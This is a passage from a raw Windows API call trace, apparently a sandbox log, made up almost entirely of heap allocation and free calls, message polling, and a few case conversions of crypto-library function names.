lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.944] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.944] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123cb) returned 0xac2018 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0039.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0039.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0039.945] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123cb) returned 0x9473e0 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.946] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.946] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0039.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.947] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da368 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.947] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.948] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.948] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0039.949] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0039.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.950] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.950] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0039.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.952] HeapFree (in: 